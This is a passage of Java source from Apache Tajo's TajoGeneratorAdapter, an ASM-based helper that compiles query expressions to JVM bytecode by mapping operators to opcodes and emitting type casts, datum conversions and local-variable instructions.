Opcodes.DDIV); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT1, Opcodes.IREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT2, Opcodes.IREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT4, Opcodes.IREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, INT8, Opcodes.LREM); TUtil.putToNestedMap(OpCodesMap, 
EvalType.MODULAR, FLOAT4, Opcodes.FREM); TUtil.putToNestedMap(OpCodesMap, EvalType.MODULAR, FLOAT8, Opcodes.DREM); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT1, Opcodes.IAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT2, Opcodes.IAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT4, Opcodes.IAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_AND, INT8, Opcodes.LAND); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT1, Opcodes.IOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT2, Opcodes.IOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT4, Opcodes.IOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_OR, INT8, Opcodes.LOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT1, Opcodes.IXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT2, Opcodes.IXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT4, Opcodes.IXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.BIT_XOR, INT8, Opcodes.LXOR); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT1, Opcodes.IF_ICMPEQ); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT2, Opcodes.IF_ICMPEQ); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT4, Opcodes.IF_ICMPEQ); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.EQUAL, TEXT, Opcodes.IF_ACMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT1, Opcodes.IF_ICMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT2, Opcodes.IF_ICMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT4, Opcodes.IF_ICMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.NOT_EQUAL, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, 
EvalType.NOT_EQUAL, TEXT, Opcodes.IF_ACMPNE); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT1, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT2, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT4, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT1, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT2, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT4, Opcodes.IF_ICMPLT); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.LTH, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT1, Opcodes.IF_ICMPLE); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT2, Opcodes.IF_ICMPLE); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT4, Opcodes.IF_ICMPLE); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.LEQ, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT1, Opcodes.IF_ICMPGT); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT2, Opcodes.IF_ICMPGT); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT4, Opcodes.IF_ICMPGT); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.GTH, FLOAT8, Opcodes.DCMPG); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT1, Opcodes.IF_ICMPGE); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT2, Opcodes.IF_ICMPGE); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT4, Opcodes.IF_ICMPGE); 
TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, INT8, Opcodes.LCMP); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, FLOAT4, Opcodes.FCMPL); TUtil.putToNestedMap(OpCodesMap, EvalType.GEQ, FLOAT8, Opcodes.DCMPG); } protected int access; protected MethodVisitor methodvisitor; protected GeneratorAdapter generatorAdapter; public TajoGeneratorAdapter() {} public TajoGeneratorAdapter(int access, MethodVisitor methodVisitor, String name, String desc) { this.access = access; this.methodvisitor = methodVisitor; generatorAdapter = new GeneratorAdapter(methodVisitor, access, name, desc); } public static boolean isJVMInternalInt(org.apache.tajo.type.Type type) { final TajoDataTypes.Type baseType = type.kind(); return baseType == BOOLEAN || baseType == INT1 || baseType == INT2 || baseType == INT4; } public static int getWordSize(org.apache.tajo.type.Type type) { final TajoDataTypes.Type baseType = type.kind(); if (baseType == INT8 || baseType == FLOAT8 || baseType == TIMESTAMP || baseType == TIME) { return 2; } else { return 1; } } public void push(final boolean value) { methodvisitor.visitInsn(value ? 
Opcodes.ICONST_1 : Opcodes.ICONST_0); } public void push(final int value) { if (value >= -1 && value <= 5) { methodvisitor.visitInsn(Opcodes.ICONST_0 + value); } else if (value >= Byte.MIN_VALUE && value <= Byte.MAX_VALUE) { methodvisitor.visitIntInsn(Opcodes.BIPUSH, value); } else if (value >= Short.MIN_VALUE && value <= Short.MAX_VALUE) { methodvisitor.visitIntInsn(Opcodes.SIPUSH, value); } else { methodvisitor.visitLdcInsn(Integer.valueOf(value)); } } public void push(final long value) { if (value == 0L || value == 1L) { methodvisitor.visitInsn(Opcodes.LCONST_0 + (int) value); } else { methodvisitor.visitLdcInsn(Long.valueOf(value)); } } public void push(final float value) { int bits = Float.floatToIntBits(value); if (bits == 0L || bits == 0x3f800000 || bits == 0x40000000) { // 0..2 methodvisitor.visitInsn(Opcodes.FCONST_0 + (int) value); } else { methodvisitor.visitLdcInsn(Float.valueOf(value)); } } public void push(final double value) { long bits = Double.doubleToLongBits(value); if (bits == 0L || bits == 0x3ff0000000000000L) { // +0.0d and 1.0d methodvisitor.visitInsn(Opcodes.DCONST_0 + (int) value); } else { methodvisitor.visitLdcInsn(new Double(value)); } } public void push(final String value) { Preconditions.checkNotNull(value); methodvisitor.visitLdcInsn(value); } public void ifCmp(org.apache.tajo.type.Type type, EvalType evalType, Label elseLabel) { if (isJVMInternalInt(type)) { switch (evalType) { case EQUAL: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPNE, elseLabel); break; case NOT_EQUAL: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPEQ, elseLabel); break; case LTH: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPGE, elseLabel); break; case LEQ: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPGT, elseLabel); break; case GTH: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPLE, elseLabel); break; case GEQ: methodvisitor.visitJumpInsn(Opcodes.IF_ICMPLT, elseLabel); break; default: throw new CompilationError("Unknown comparison operator: " + evalType.name()); } } else { if 
(type.kind() == TEXT) { invokeVirtual(String.class, "compareTo", int.class, new Class[]{String.class}); } else { int opCode = TajoGeneratorAdapter.getOpCode(evalType, type); methodvisitor.visitInsn(opCode); } switch (evalType) { case EQUAL: methodvisitor.visitJumpInsn(Opcodes.IFNE, elseLabel); break; case NOT_EQUAL: methodvisitor.visitJumpInsn(Opcodes.IFEQ, elseLabel); break; case LTH: methodvisitor.visitJumpInsn(Opcodes.IFGE, elseLabel); break; case LEQ: methodvisitor.visitJumpInsn(Opcodes.IFGT, elseLabel); break; case GTH: methodvisitor.visitJumpInsn(Opcodes.IFLE, elseLabel); break; case GEQ: methodvisitor.visitJumpInsn(Opcodes.IFLT, elseLabel); break; default: throw new CompilationError("Unknown comparison operator: " + evalType.name()); } } } public void load(org.apache.tajo.type.Type type, int idx) { switch (type.kind()) { case NULL_TYPE: case BOOLEAN: case CHAR: case INT1: case INT2: case INT4: methodvisitor.visitVarInsn(Opcodes.ILOAD, idx); break; case INT8: methodvisitor.visitVarInsn(Opcodes.LLOAD, idx); break; case FLOAT4: methodvisitor.visitVarInsn(Opcodes.FLOAD, idx); break; case FLOAT8: methodvisitor.visitVarInsn(Opcodes.DLOAD, idx); break; case TEXT: case INTERVAL: case PROTOBUF: methodvisitor.visitVarInsn(Opcodes.ALOAD, idx); break; default: throw new CompilationError("Unknown data type: " + type); } } public static String getDescription(Class clazz) { if (clazz == null) { return ""; } else if (clazz == void.class) { return "V"; } else if (clazz == boolean.class) { return "Z"; } else if (clazz == char.class) { return "C"; } else if (clazz == byte.class) { return "B"; } else if (clazz == short.class) { return "S"; } else if (clazz == int.class) { return "I"; } else if (clazz == long.class) { return "J"; } else if (clazz == float.class) { return "F"; } else if (clazz == double.class) { return "D"; } else if (clazz.isArray()) { return "[" + getDescription(clazz.getComponentType()); } else { return "L" + getInternalName(clazz) + ";"; } } public static 
String getMethodDescription(Class returnType, Class [] argumentTypes) { StringBuilder builder = new StringBuilder(); builder.append("("); if (argumentTypes != null) { for (Class argType : argumentTypes) { builder.append(getDescription(argType)); } } builder.append(")"); builder.append(getDescription(returnType)); return builder.toString(); } public Label newLabel() { return new Label(); } public void markLabel(Label label) { methodvisitor.visitLabel(label); } public void gotoLabel(Label label) { methodvisitor.visitJumpInsn(Opcodes.GOTO, label); } public void pushBooleanOfThreeValuedLogic(boolean value) { push(value ? 1 : 2); // TRUE or FALSE } public void pushNullOfThreeValuedLogic() { push(0); // NULL of three valued logic } public void pushNullFlag(boolean trueIfNotNull) { push(trueIfNotNull ? true : false); } public void emitNullityCheck(Label ifNull) { methodvisitor.visitJumpInsn(Opcodes.IFEQ, ifNull); } /** * If at least one of all local variables corresponding to <code>varIds</code> is null, jump the <code>label</code>. * * @param ifNull The label to jump * @param varIds A list of variable Ids. */ public void emitNullityCheck(Label ifNull, int ... varIds) { // TODO - ANDing can be reduced if we interleave IAND into a sequence of ILOAD instructions. 
for (int varId : varIds) { methodvisitor.visitVarInsn(Opcodes.ILOAD, varId); } if (varIds.length > 1) { for (int i = 0; i < varIds.length - 1; i++) { methodvisitor.visitInsn(Opcodes.IAND); } } emitNullityCheck(ifNull); } public void pushDummyValue(org.apache.tajo.type.Type type) { TajoDataTypes.Type baseType = type.kind(); if (type.isNull()) { pushNullOfThreeValuedLogic(); } else if (isJVMInternalInt(type) || baseType == DATE) { push(0); } else if (baseType == INT8 || baseType == TIMESTAMP || baseType == TIME) { push(0L); } else if (baseType == FLOAT8) { push(0.0d); } else if (baseType == FLOAT4) { push(0.0f); } else if (baseType == CHAR || baseType == TEXT) { push(""); } else if (baseType == INTERVAL || baseType == PROTOBUF) { invokeStatic(NullDatum.class, "get", NullDatum.class, new Class[]{}); } else { assert false; } } public void newInstance(Class owner, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKESPECIAL, getInternalName(owner), "<init>", getMethodDescription(void.class, paramTypes)); } public void invokeSpecial(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKESPECIAL, getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public void invokeStatic(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public void invokeVirtual(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKEVIRTUAL, Type.getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public void invokeInterface(Class owner, String methodName, Class returnType, Class [] paramTypes) { methodvisitor.visitMethodInsn(Opcodes.INVOKEINTERFACE, Type.getInternalName(owner), methodName, getMethodDescription(returnType, paramTypes)); } public 
// Returns true when (evalType, returnType.kind()) has a primitive JVM opcode
// registered in OpCodesMap.
static boolean isPrimitiveOpCode(EvalType evalType, org.apache.tajo.type.Type returnType) {
  return TUtil.containsInNestedMap(OpCodesMap, evalType, returnType.kind());
}

/**
 * Looks up the JVM opcode registered for the given eval type and result type.
 *
 * @throws CompilationError if no opcode is registered for the pair.
 */
public static int getOpCode(EvalType evalType, org.apache.tajo.type.Type returnType) {
  if (!isPrimitiveOpCode(evalType, returnType)) {
    throw new CompilationError("No Such OpCode for " + evalType + " returning " + returnType);
  }
  return TUtil.getFromNestedMap(OpCodesMap, evalType, returnType.kind());
}

/**
 * Emits the bytecode that converts the value on top of the operand stack from
 * {@code srcType} to {@code targetType}: JVM primitive conversion instructions
 * (I2L, F2D, ...) for numeric casts, String.valueOf/parse helpers for TEXT, and
 * DateTimeUtil conversions for date/time targets of TEXT sources.
 *
 * @throws TajoRuntimeException (InvalidValueForCastException) for unsupported casts.
 */
public void castInsn(org.apache.tajo.type.Type srcType, org.apache.tajo.type.Type targetType) {
  TajoDataTypes.Type srcBaseType = srcType.kind();
  TajoDataTypes.Type targetBaseType = targetType.kind();
  switch(srcBaseType) {
  case BOOLEAN:
  case CHAR: {
    // NOTE(review): BOOLEAN falls through into this branch and srcType is cast
    // to Char below — verify BOOLEAN sources really reach here as Char, else
    // this would throw ClassCastException.
    Char srcCharType = (Char) srcType;
    if (srcCharType.length() == 1) {
      // Single-character CHAR is held on the stack as an int.
      switch (targetBaseType) {
      case CHAR:
      case INT1:
      case INT2:
      case INT4:
        break; // already int-compatible; no instruction needed
      case INT8:
        methodvisitor.visitInsn(Opcodes.I2L);
        break;
      case FLOAT4:
        methodvisitor.visitInsn(Opcodes.I2F);
        break;
      case FLOAT8:
        methodvisitor.visitInsn(Opcodes.I2D);
        break;
      case TEXT:
        emitStringValueOfChar();
        break;
      default:
        throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
      }
    } else {
      // Multi-character CHAR is held as a String; parse to the numeric target.
      switch (targetBaseType) {
      case CHAR:
      case INT1:
      case INT2:
      case INT4:
        emitParseInt4();
        break;
      case INT8:
        emitParseInt8();
        break;
      case FLOAT4:
        emitParseFloat4();
        break;
      case FLOAT8:
        emitParseFloat8();
        break;
      case TEXT:
        break; // String to String: no-op
      default:
        throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
      }
    }
    break;
  }
  case INT1:
  case INT2:
  case INT4:
    switch (targetBaseType) {
    case CHAR:
    case INT1:
      methodvisitor.visitInsn(Opcodes.I2C);
      break;
    case INT2:
      methodvisitor.visitInsn(Opcodes.I2S);
      break;
    case INT4:
      return; // identity cast: nothing to emit
    case INT8:
      methodvisitor.visitInsn(Opcodes.I2L);
      break;
    case FLOAT4:
      methodvisitor.visitInsn(Opcodes.I2F);
      break;
    case FLOAT8:
      methodvisitor.visitInsn(Opcodes.I2D);
      break;
    case TEXT:
      emitStringValueOfInt4();
      break;
    default:
      throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
    }
    break;
  case INT8:
    switch (targetBaseType) {
    case CHAR:
    case INT1:
    case INT2:
    case INT4:
      methodvisitor.visitInsn(Opcodes.L2I);
      break;
    case INT8:
      return;
    case FLOAT4:
      methodvisitor.visitInsn(Opcodes.L2F);
      break;
    case FLOAT8:
      methodvisitor.visitInsn(Opcodes.L2D);
      break;
    case TEXT:
      emitStringValueOfInt8();
      break;
    default:
      throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
    }
    break;
  case FLOAT4:
    switch (targetBaseType) {
    case CHAR:
    case INT1:
    case INT2:
    case INT4:
      methodvisitor.visitInsn(Opcodes.F2I);
      break;
    case INT8:
      methodvisitor.visitInsn(Opcodes.F2L);
      break;
    case FLOAT4:
      return;
    case FLOAT8:
      methodvisitor.visitInsn(Opcodes.F2D);
      break;
    case TEXT:
      emitStringValueOfFloat4();
      break;
    default:
      throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
    }
    break;
  case FLOAT8:
    switch (targetBaseType) {
    case CHAR:
    case INT1:
    case INT2:
    case INT4:
      methodvisitor.visitInsn(Opcodes.D2I);
      break;
    case INT8:
      methodvisitor.visitInsn(Opcodes.D2L);
      break;
    case FLOAT4:
      methodvisitor.visitInsn(Opcodes.D2F);
      break;
    case FLOAT8:
      return;
    case TEXT:
      emitStringValueOfFloat8();
      break;
    default:
      throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
    }
    break;
  case TEXT:
    switch (targetBaseType) {
    case CHAR:
    case INT1:
    case INT2:
    case INT4:
      emitParseInt4();
      break;
    case INT8:
      emitParseInt8();
      break;
    case FLOAT4:
      emitParseFloat4();
      break;
    case FLOAT8:
      emitParseFloat8();
      break;
    case TEXT:
      break;
    case TIMESTAMP: {
      // String -> Julian timestamp (long) via DateTimeUtil.toJulianTimestampWithTZ.
      methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC,
          Type.getInternalName(DateTimeUtil.class), "toJulianTimestampWithTZ",
          "(L" + Type.getInternalName(String.class) + ";)J");
      break;
    }
    case DATE: {
      // String -> Julian date (int) via DateTimeUtil.toJulianDate.
      methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC,
          Type.getInternalName(DateTimeUtil.class), "toJulianDate",
          "(L" + Type.getInternalName(String.class) + ";)I");
      break;
    }
    case TIME: {
      // String -> Julian time (long) via DateTimeUtil.toJulianTime.
      methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC,
          Type.getInternalName(DateTimeUtil.class), "toJulianTime",
          "(L" + Type.getInternalName(String.class) + ";)J");
      break;
    }
    default:
      throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
    }
    break;
  default:
    throw new TajoRuntimeException(new InvalidValueForCastException(srcType, targetType));
  }
}

/** Converts a dotted class name to the JVM internal form (dots to slashes). */
public static String getInternalName(String className) {
  return className.replace('.', '/');
}

/** Returns the JVM internal name of {@code clazz} (dots to slashes). */
public static String getInternalName(Class clazz) {
  return clazz.getName().replace('.', '/');
}

/**
 * Emits code that unwraps the Datum on top of the stack into its primitive JVM
 * representation followed by a null flag: stack becomes [primitive, nullFlag].
 * On the null path a type-appropriate dummy value is pushed with a false flag
 * so the stack shape stays identical on both branches.
 */
public void convertToPrimitive(org.apache.tajo.type.Type type) {
  Label ifNull = new Label();
  Label afterAll = new Label();

  // datum
  int datum = astore();
  aload(datum);
  invokeVirtual(Datum.class, "isNotNull", boolean.class, new Class [] {});
  methodvisitor.visitJumpInsn(Opcodes.IFEQ, ifNull);

  // datum
  aload(datum);
  switch (type.kind()) {
  case BOOLEAN:
  case INT1:
  case INT2:
    invokeVirtual(Datum.class, "asInt2", short.class, new Class[] {});
    break;
  case INT4:
  case DATE: // DATE is int-backed (Julian date)
    invokeVirtual(Datum.class, "asInt4", int.class, new Class[] {});
    break;
  case INT8:
  case TIMESTAMP:
  case TIME: // long-backed types
    invokeVirtual(Datum.class, "asInt8", long.class, new Class[] {});
    break;
  case FLOAT4:
    invokeVirtual(Datum.class, "asFloat4", float.class, new Class[] {});
    break;
  case FLOAT8:
    invokeVirtual(Datum.class, "asFloat8", double.class, new Class[] {});
    break;
  case CHAR:
  case TEXT:
    invokeVirtual(Datum.class, "asChars", String.class, new Class[]{});
    break;
  default:
    throw new TajoRuntimeException(new UnsupportedException("data type '" + type + "'"));
  }
  pushNullFlag(true);
  gotoLabel(afterAll);

  methodvisitor.visitLabel(ifNull);
  pushDummyValue(type);
  pushNullFlag(false);

  methodvisitor.visitLabel(afterAll);
}

/**
 * Emits code that wraps the [primitive, nullFlag] pair on top of the stack back
 * into a Datum via the matching DatumFactory.createXxx method; a zero null flag
 * produces the NullDatum singleton instead. When {@code castToDatum} is set, a
 * CHECKCAST to Datum is appended to unify the result type.
 */
public void convertToDatum(org.apache.tajo.type.Type type, boolean castToDatum) {
  String convertMethod;
  Class returnType;
  Class [] paramTypes;

  switch (type.kind()) {
  case NULL_TYPE:
    // Discard both stack slots and push the NullDatum singleton directly.
    pop(); // pop null flag
    pop(type); // pop null datum
    invokeStatic(NullDatum.class, "get", NullDatum.class, new Class[] {});
    if (castToDatum) {
      methodvisitor.visitTypeInsn(Opcodes.CHECKCAST, getInternalName(Datum.class));
    }
    return;
  case BOOLEAN:
    convertMethod = "createBool";
    returnType = Datum.class;
    paramTypes = new Class[] {int.class}; // three-valued-logic int encoding
    break;
  case CHAR:
    convertMethod = "createChar";
    returnType = CharDatum.class;
    paramTypes = new Class[] {String.class};
    break;
  case INT1:
  case INT2:
    convertMethod = "createInt2";
    returnType = Int2Datum.class;
    paramTypes = new Class[] {short.class};
    break;
  case INT4:
    convertMethod = "createInt4";
    returnType = Int4Datum.class;
    paramTypes = new Class[] {int.class};
    break;
  case INT8:
    convertMethod = "createInt8";
    returnType = Int8Datum.class;
    paramTypes = new Class[] {long.class};
    break;
  case FLOAT4:
    convertMethod = "createFloat4";
    returnType = Float4Datum.class;
    paramTypes = new Class[] {float.class};
    break;
  case FLOAT8:
    convertMethod = "createFloat8";
    returnType = Float8Datum.class;
    paramTypes = new Class[] {double.class};
    break;
  case TEXT:
    convertMethod = "createText";
    returnType = TextDatum.class;
    paramTypes = new Class[] {String.class};
    break;
  case TIMESTAMP:
    convertMethod = "createTimestamp";
    returnType = TimestampDatum.class;
    paramTypes = new Class[] {long.class};
    break;
  case DATE:
    convertMethod = "createDate";
    returnType = DateDatum.class;
    paramTypes = new Class[] {int.class};
    break;
  case TIME:
    convertMethod = "createTime";
    returnType = TimeDatum.class;
    paramTypes = new Class[] {long.class};
    break;
  case INTERVAL:
  case PROTOBUF:
    // Already Datum objects on the stack (see pushDummyValue); no factory call.
    convertMethod = null;
    returnType = null;
    paramTypes = null;
    break;
  default:
    throw new RuntimeException("Unsupported type: " + type);
  }

  Label ifNull = new Label();
  Label afterAll = new Label();

  emitNullityCheck(ifNull);
  if (convertMethod != null) {
    invokeStatic(DatumFactory.class, convertMethod, returnType, paramTypes);
  }
  methodvisitor.visitJumpInsn(Opcodes.GOTO, afterAll);

  methodvisitor.visitLabel(ifNull);
  pop(type);
  // null paramTypes produces a no-arg descriptor (see getMethodDescription).
  invokeStatic(NullDatum.class, "get", NullDatum.class, null);

  methodvisitor.visitLabel(afterAll);

  if (castToDatum) {
    methodvisitor.visitTypeInsn(Opcodes.CHECKCAST, TajoGeneratorAdapter.getInternalName(Datum.class));
  }
}

/** Pops one logical value, using POP2 for two-word (long/double) types. */
public void pop(org.apache.tajo.type.Type type) {
  if (getWordSize(type) == 2) {
    methodvisitor.visitInsn(Opcodes.POP2);
  } else {
    methodvisitor.visitInsn(Opcodes.POP);
  }
}

/** Emits String.valueOf(char) for the char on top of the stack. */
public void emitStringValueOfChar() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class),
      "valueOf", "(C)L" + Type.getInternalName(String.class) + ";");
}

/** Emits String.valueOf(int) for the int on top of the stack. */
public void emitStringValueOfInt4() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class),
      "valueOf", "(I)L" + Type.getInternalName(String.class) + ";");
}

/** Emits String.valueOf(long) for the long on top of the stack. */
public void emitStringValueOfInt8() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class),
      "valueOf", "(J)L" + Type.getInternalName(String.class) + ";");
}

/** Emits String.valueOf(float) for the float on top of the stack. */
public void emitStringValueOfFloat4() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class),
      "valueOf", "(F)L" + Type.getInternalName(String.class) + ";");
}

/** Emits String.valueOf(double) for the double on top of the stack. */
public void emitStringValueOfFloat8() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(String.class),
      "valueOf", "(D)L" + Type.getInternalName(String.class) + ";");
}

/** Emits Integer.parseInt(String) for the String on top of the stack. */
public void emitParseInt4() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Integer.class),
      "parseInt", "(L" + Type.getInternalName(String.class) + ";)I");
}

/** Emits Long.parseLong(String) for the String on top of the stack. */
public void emitParseInt8() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Long.class),
      "parseLong", "(L" + Type.getInternalName(String.class) + ";)J");
}

/** Emits Float.parseFloat(String) for the String on top of the stack. */
public void emitParseFloat4() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Float.class),
      "parseFloat", "(L" + Type.getInternalName(String.class) + ";)F");
}

/** Emits Double.parseDouble(String) for the String on top of the stack. */
public void emitParseFloat8() {
  methodvisitor.visitMethodInsn(Opcodes.INVOKESTATIC, Type.getInternalName(Double.class),
      "parseDouble", "(L" + Type.getInternalName(String.class) + ";)D");
}

public
/**
 * Emits the instruction creating a one-dimensional array of {@code clazz}:
 * NEWARRAY with the matching type code for primitives, ANEWARRAY for reference types.
 */
void newArray(final Class clazz) {
  int typeCode;
  if (clazz == boolean.class) {
    typeCode = Opcodes.T_BOOLEAN;
  } else if (clazz == char.class) {
    typeCode = Opcodes.T_CHAR;
  } else if (clazz == byte.class) {
    typeCode = Opcodes.T_BYTE;
  } else if (clazz == short.class) {
    typeCode = Opcodes.T_SHORT;
  } else if (clazz == int.class) {
    typeCode = Opcodes.T_INT;
  } else if (clazz == long.class) {
    typeCode = Opcodes.T_LONG;
  } else if (clazz == float.class) {
    typeCode = Opcodes.T_FLOAT;
  } else if (clazz == double.class) {
    typeCode = Opcodes.T_DOUBLE;
  } else {
    // Reference types use ANEWARRAY with the internal class name.
    methodvisitor.visitTypeInsn(Opcodes.ANEWARRAY, getInternalName(clazz));
    return;
  }
  methodvisitor.visitIntInsn(Opcodes.NEWARRAY, typeCode);
}

// Next free local-variable slot; slots 0-2 are reserved for the generated
// method's receiver/parameters.
private int nextVarId = 3;

// Named local variables mapped to their allocated slot ids.
private Map<String, Integer> localVariablesMap = new HashMap<>();

/** Stores the object on top of the stack into the slot named {@code name}, allocating a slot on first use. */
public void astore(String name) {
  if (localVariablesMap.containsKey(name)) {
    int varId = localVariablesMap.get(name);
    methodvisitor.visitVarInsn(Opcodes.ASTORE, varId);
  } else {
    int varId = nextVarId++;
    methodvisitor.visitVarInsn(Opcodes.ASTORE, varId);
    localVariablesMap.put(name, varId);
  }
}

/** Stores the object on top of the stack into a freshly allocated slot and returns its id. */
public int astore() {
  int varId = getCurVarIdAndIncrease();
  methodvisitor.visitVarInsn(Opcodes.ASTORE, varId);
  return varId;
}

/** Stores the object on top of the stack into the given slot. */
public void astore(int varId) {
  methodvisitor.visitVarInsn(Opcodes.ASTORE, varId);
}

/**
 * Loads the named local variable onto the stack.
 *
 * @throws RuntimeException if the name was never stored via {@link #astore(String)}.
 */
public void aload(String name) {
  if (localVariablesMap.containsKey(name)) {
    int varId = localVariablesMap.get(name);
    methodvisitor.visitVarInsn(Opcodes.ALOAD, varId);
  } else {
    throw new RuntimeException("No such variable name: " + name);
  }
}

/** Loads the object in the given slot onto the stack. */
public void aload(int varId) {
  methodvisitor.visitVarInsn(Opcodes.ALOAD, varId);
}

/** Emits DUP. */
public void dup() {
  methodvisitor.visitInsn(Opcodes.DUP);
}

/** Emits POP (one word). */
public void pop() {
  methodvisitor.visitInsn(Opcodes.POP);
}

/** Emits POP2 (two words). */
public void pop2() {
  methodvisitor.visitInsn(Opcodes.POP2);
}

/** Stores the int on top of the stack into a freshly allocated slot and returns its id. */
public int istore() {
  int varId = getCurVarIdAndIncrease();
  return istore(varId);
}

/** Stores the int on top of the stack into the given slot. */
public int istore(int varId) {
  methodvisitor.visitVarInsn(Opcodes.ISTORE, varId);
  return varId;
}

/** Loads the int in the given slot onto the stack. */
public void iload(int varId) {
  methodvisitor.visitVarInsn(Opcodes.ILOAD, varId);
}

// NOTE(review): allocates exactly one slot regardless of value width, unlike
// store(Type) which accounts for two-word types — confirm callers only use this
// for one-word values.
private int getCurVarIdAndIncrease() {
  int varId = nextVarId++;
